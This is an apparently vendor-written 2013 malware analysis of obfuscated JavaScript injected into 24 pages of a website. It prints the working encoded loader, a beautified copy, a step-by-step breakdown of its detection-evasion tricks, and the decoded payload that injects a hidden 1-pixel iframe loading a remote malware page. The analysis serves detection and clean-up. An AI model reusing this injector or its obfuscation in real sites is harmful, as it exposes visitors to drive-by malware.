Thursday, March 28, 2013

Malicious hidden iframe downloads content from suspicious website


Obfuscated JavaScript code generates iframe to load content from suspicious website

Background


Online Website Malware Scanner detected malicious JavaScript code injection.This sort of malicious obfuscated JavaScript code is used to build malicious iframe that is not visible to the website user to finally bring content from remote malware distributor. In case of this website the suspicious JavaScript code is injected in 24 files. As discussed in other posts about malicious iframes generation the flow is very similar and contains multiple levels of obfuscation to overcome the detection mechanisms. 


Malicious action


Malicious iframes are usually utilized to distribute malware from external web resources(websites).


Detection details


Submission date: Thu Mar 28 08:14:34 2013
Infected website pages: 24
Website malware scan report: http://goo.gl/rsXvJ
Snapshot from Quttera's online Website Malware Scanner























Threat dump:
[[                                                                                                                                                                                                                                                          asq=function(){return n[i];};ww=window;ss=String["fro"+"mC"+"harC"+"o"+"de"];try{document.body=~1}catch(dgsgsdg){zz=12*2+1+1;whwej=12;}if(whwej){try{}catch(agdsg){whwej=0;}try{document.body--;}catch(bawetawe){if(ww.document){n="0x29,0x67,0x76,0x6f,0x64,0x75,0x6a,0x70,0x6f,0x21,0x29,0x2a,0x21,0x7c,0xe,0xb,0x21,0x21,0x21,0x21,0x77,0x62,0x73,0x21,0x72,0x6a,0x7b,0x7b,0x21,0x3e,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x64,0x73,0x66,0x62,0x75,0x66,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x29,0x28,0x6a,0x67,0x73,0x62,0x6e,0x66,0x28,0x2a,0x3c,0xe,0xb,0xe,0xb,0x21,0x21,0x21,0x21,0x72,0x6a,0x7b,0x7b,0x2f,0x74,0x73,0x64,0x21,0x3e,0x21,0x28,0x69,0x75,0x75,0x71,0x3b,0x30,0x30,0x74,0x76,0x71,0x66,0x73,0x77,0x70,0x6d,0x75,0x2f,0x6a,0x66,0x30,0x64,0x70,0x6d,0x6a,0x6f,0x30,0x64,0x6d,0x6c,0x2f,0x71,0x69,0x71,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x72,0x6a,0x7b,0x7b,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x71,0x70,0x74,0x6a,0x75,0x6a,0x70,0x6f,0x21,0x3e,0x21,0x28,0x62,0x63,0x74,0x70,0x6d,0x76,0x75,0x66,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x72,0x6a,0x7b,0x7b,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x63,0x70,0x73,0x65,0x66,0x73,0x21,0x3e,0x21,0x28,0x31,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x72,0x6a,0x7b,0x7b,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x69,0x66,0x6a,0x68,0x69,0x75,0x21,0x3e,0x21,0x28,0x32,0x71,0x79,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x72,0x6a,0x7b,0x7b,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x78,0x6a,0x65,0x75,0x69,0x21,0x3e,0x21,0x28,0x32,0x71,0x79,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x72,0x6a,0x7b,0x7b,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x6d,0x66,0x67,0x75,0x21,0x3e,0x21,0x28,0x32,0x71,0x79,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x72,0x6a,0x7b,0x7b,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x75,0x70,0x71,0x21,0x3e,0x21,0x28,0x32,0x71,0x79,0x28,0x3c,0xe,0xb,0xe,0xb,0x21,0x21,0x21,0x21,0x6a,0x67,0x21,0x29,0x22,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x68,0x66,0x75,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x43,0x7a,0x4a,0x65,0x29,0x28,0x72,0x6a,0x7b,0x7b,0x28,0x2a,0x2a,0x21,0x7c,0xe,0xb,0x21,0x21,0x21,0x21,0x21,0x21,0x21,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x78,0x73,0x6a,0x75,0x66,0x29,0x28,0x3d,0x65,0x6a,0x77,0x21,0x6a,0x65,0x3e,0x5d,0x28,0x72,0x6a,0x7b,0x7b,0x5d,0x28,0x3f,0x3d,0x30,0x65,0x6a,0x77,0x3f,0x28,0x2a,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x21,0x21,0x21,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x68,0x66,0x75,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x43,0x7a,0x4a,0x65,0x29,0x28,0x72,0x6a,0x7b,0x7b,0x28,0x2a,0x2f,0x62,0x71,0x71,0x66,0x6f,0x65,0x44,0x69,0x6a,0x6d,0x65,0x29,0x72,0x6a,0x7b,0x7b,0x2a,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x7e,0xe,0xb,0x7e,0x2a,0x29,0x2a,0x3c".split(",");h=2;s="";if(whwej){for(i=0;i-483!=0;i++){k=i;s=s.concat(ss(eval(asq())-1));}z=s;ww["eval"](""+s);}}}}]]




Malware entry

Beautified script



asq = function () {
    return n[i];
};
ww = window;
ss = String["fro" + "mC" + "harC" + "o" + "de"]; 
try {
    document.body = ~1  
} catch (dgsgsdg) {
    zz = 12 * 2 + 1 + 1;
    whwej = 12;
}
if (whwej) {
    try {} catch (agdsg) {
        whwej = 0;
    }
    try {
        document.body--;  
    } catch (bawetawe) {
        if (ww.document) {
            n = "0x29,0x67,0x76,0x6f,0x64,0x75,0x6a,0x70,0x6f,0x21,0x29,0x2a,0x21,0x7c,0xe,0xb,0x21,0x21,0x21,0x21,0x77,0x62,0x73,0x21,0x72,0x6a,0x7b,0x7b,0x21,0x3e,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x64,0x73,0x66,0x62,0x75,0x66,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x29,0x28,0x6a,0x67,0x73,0x62,0x6e,0x66,0x28,0x2a,0x3c,0xe,0xb,0xe,0xb,0x21,0x21,0x21,0x21,0x72,0x6a,0x7b,0x7b,0x2f,0x74,0x73,0x64,0x21,0x3e,0x21,0x28,0x69,0x75,0x75,0x71,0x3b,0x30,0x30,0x74,0x76,0x71,0x66,0x73,0x77,0x70,0x6d,0x75,0x2f,0x6a,0x66,0x30,0x64,0x70,0x6d,0x6a,0x6f,0x30,0x64,0x6d,0x6c,0x2f,0x71,0x69,0x71,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x72,0x6a,0x7b,0x7b,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x71,0x70,0x74,0x6a,0x75,0x6a,0x70,0x6f,0x21,0x3e,0x21,0x28,0x62,0x63,0x74,0x70,0x6d,0x76,0x75,0x66,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x72,0x6a,0x7b,0x7b,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x63,0x70,0x73,0x65,0x66,0x73,0x21,0x3e,0x21,0x28,0x31,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x72,0x6a,0x7b,0x7b,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x69,0x66,0x6a,0x68,0x69,0x75,0x21,0x3e,0x21,0x28,0x32,0x71,0x79,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x72,0x6a,0x7b,0x7b,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x78,0x6a,0x65,0x75,0x69,0x21,0x3e,0x21,0x28,0x32,0x71,0x79,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x72,0x6a,0x7b,0x7b,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x6d,0x66,0x67,0x75,0x21,0x3e,0x21,0x28,0x32,0x71,0x79,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x72,0x6a,0x7b,0x7b,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x75,0x70,0x71,0x21,0x3e,0x21,0x28,0x32,0x71,0x79,0x28,0x3c,0xe,0xb,0xe,0xb,0x21,0x21,0x21,0x21,0x6a,0x67,0x21,0x29,0x22,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x68,0x66,0x75,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x43,0x7a,0x4a,0x65,0x29,0x28,0x72,0x6a,0x7b,0x7b,0x28,0x2a,0x2a,0x21,0x7c,0xe,0xb,0x21,0x21,0x21,0x21,0x21,0x21,0x21,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x78,0x73,0x6a,0x75,0x66,0x29,0x28,0x3d,0x65,0x6a,0x77,0x21,0x6a,0x65,0x3e,0x5d,0x28,0x72,0x6a,0x7b,0x7b,0x5d,0x28,0x3f,0x3d,0x30,0x65,0x6a,0x77,0x3f,0x28,0x2a,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x21,0x21,0x21,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x68,0x66,0x75,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x43,0x7a,0x4a,0x65,0x29,0x28,0x72,0x6a,0x7b,0x7b,0x28,0x2a,0x2f,0x62,0x71,0x71,0x66,0x6f,0x65,0x44,0x69,0x6a,0x6d,0x65,0x29,0x72,0x6a,0x7b,0x7b,0x2a,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x7e,0xe,0xb,0x7e,0x2a,0x29,0x2a,0x3c".split(",");
            h = 2;
            s = "";
            if (whwej) {
                for (i = 0; i - 483 != 0; i++) {
                    k = i;
                    s = s.concat(ss(eval(asq()) - 1));
                }
                z = s;
                ww["eval"]("" + s);
            }
        }
    }
}
(function () {
    var qizz = document.createElement('iframe');
    qizz.src = 'http://supervolt.ie/colin/clk.php';
    qizz.style.position = 'absolute';
    qizz.style.border = '0';
    qizz.style.height = '1px';
    qizz.style.width = '1px';
    qizz.style.left = '1px';
    qizz.style.top = '1px';

    if (!document.getElementById('qizz')) {
        document.write('<div id=\'qizz\'>');
        document.getElementById('qizz').appendChild(qizz);
    }
})();

Malicious JavaScript analysis


Now let's go through the script step-by-step to see which technique is used by hacker and why. It should not be very difficult for understanding if you have medium level experience in JavaScript.

1. stores reference to window object into ww variable to overcome pattern based detection

asq = function () {
    return n[i];
};
ww = window;

2. stores reference to String.fromCharCode into local variable to overcome pattern based detection ss = String.fromCharCode


ss = String["fro" + "mC" + "harC" + "o" + "de"];

3. following execution exception blocks are used only for execution flow manipulation and not for handling of execution errors

3.1 force execution exception to set whwej to non-zero value

try {
    document.body = ~1
} catch (dgsgsdg) {
    zz = 12 * 2 + 1 + 1;
    whwej = 12;
}
if (whwej) {
    try {} catch (agdsg) {
        whwej = 0;
    }

3.2 force execution exception to enter following if statement

    try {
        document.body--;
    } catch (bawetawe) {
        if (ww.document) {
            n = "0x29,0x67,0x76,0x6f,0x64,0x75,0x6a,0x70,0x6f,0x21,0x29,0x2a,0x21,0x7c,0xe,0xb,0x21,0x21,0x21,0x21,0x77,0x62,0x73,0x21,0x72,0x6a,0x7b,0x7b,0x21,0x3e,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x64,0x73,0x66,0x62,0x75,0x66,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x29,0x28,0x6a,0x67,0x73,0x62,0x6e,0x66,0x28,0x2a,0x3c,0xe,0xb,0xe,0xb,0x21,0x21,0x21,0x21,0x72,0x6a,0x7b,0x7b,0x2f,0x74,0x73,0x64,0x21,0x3e,0x21,0x28,0x69,0x75,0x75,0x71,0x3b,0x30,0x30,0x74,0x76,0x71,0x66,0x73,0x77,0x70,0x6d,0x75,0x2f,0x6a,0x66,0x30,0x64,0x70,0x6d,0x6a,0x6f,0x30,0x64,0x6d,0x6c,0x2f,0x71,0x69,0x71,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x72,0x6a,0x7b,0x7b,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x71,0x70,0x74,0x6a,0x75,0x6a,0x70,0x6f,0x21,0x3e,0x21,0x28,0x62,0x63,0x74,0x70,0x6d,0x76,0x75,0x66,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x72,0x6a,0x7b,0x7b,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x63,0x70,0x73,0x65,0x66,0x73,0x21,0x3e,0x21,0x28,0x31,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x72,0x6a,0x7b,0x7b,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x69,0x66,0x6a,0x68,0x69,0x75,0x21,0x3e,0x21,0x28,0x32,0x71,0x79,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x72,0x6a,0x7b,0x7b,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x78,0x6a,0x65,0x75,0x69,0x21,0x3e,0x21,0x28,0x32,0x71,0x79,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x72,0x6a,0x7b,0x7b,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x6d,0x66,0x67,0x75,0x21,0x3e,0x21,0x28,0x32,0x71,0x79,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x72,0x6a,0x7b,0x7b,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x75,0x70,0x71,0x21,0x3e,0x21,0x28,0x32,0x71,0x79,0x28,0x3c,0xe,0xb,0xe,0xb,0x21,0x21,0x21,0x21,0x6a,0x67,0x21,0x29,0x22,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x68,0x66,0x75,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x43,0x7a,0x4a,0x65,0x29,0x28,0x72,0x6a,0x7b,0x7b,0x28,0x2a,0x2a,0x21,0x7c,0xe,0xb,0x21,0x21,0x21,0x21,0x21,0x21,0x21,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x78,0x73,0x6a,0x75,0x66,0x29,0x28,0x3d,0x65,0x6a,0x77,0x21,0x6a,0x65,0x3e,0x5d,0x28,0x72,0x6a,0x7b,0x7b,0x5d,0x28,0x3f,0x3d,0x30,0x65,0x6a,0x77,0x3f,0x28,0x2a,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x21,0x21,0x21,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x68,0x66,0x75,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x43,0x7a,0x4a,0x65,0x29,0x28,0x72,0x6a,0x7b,0x7b,0x28,0x2a,0x2f,0x62,0x71,0x71,0x66,0x6f,0x65,0x44,0x69,0x6a,0x6d,0x65,0x29,0x72,0x6a,0x7b,0x7b,0x2a,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x7e,0xe,0xb,0x7e,0x2a,0x29,0x2a,0x3c".split(",");
            h = 2;
            s = "";
            if (whwej) {

4. following for loop performs actual decoding of the encoded payload

for (i = 0; i - 483 != 0; i++) {
                    k = i;

4.1  following is identical to s += String.fromCharCode(n[i]-1)

s = s.concat(ss(eval(asq()) - 1));
                }
                z = s;

4.2  following is identical to eval(s)

                ww["eval"]("" + s);
            }
        }
    }
}


Detected malware payload

decoded payload generates hidden iframe to http://supervolt[.]ie/colin/clk[.]php (added brackets for safety purposes)

(function () {
    var qizz = document.createElement('iframe');

    qizz.src = 'http://supervolt.ie/colin/clk.php';
    qizz.style.position = 'absolute';
    qizz.style.border = '0';
    qizz.style.height = '1px';
    qizz.style.width = '1px';
    qizz.style.left = '1px';
    qizz.style.top = '1px';

    if (!document.getElementById('qizz')) {
        document.write('<div id=\'qizz\'>');
        document.getElementById('qizz').appendChild(qizz);
    }
})();

Balcklisting status

http://www.google.com/safebrowsing/diagnostic?site=www.tispa.or.th
Google safebrowsing snapshot

Malware clean-up

Such malware is often hidden inside the JavaScript file. If your website was infected by similar malware please use Website Anti-malware Monitoring for remediation assessment.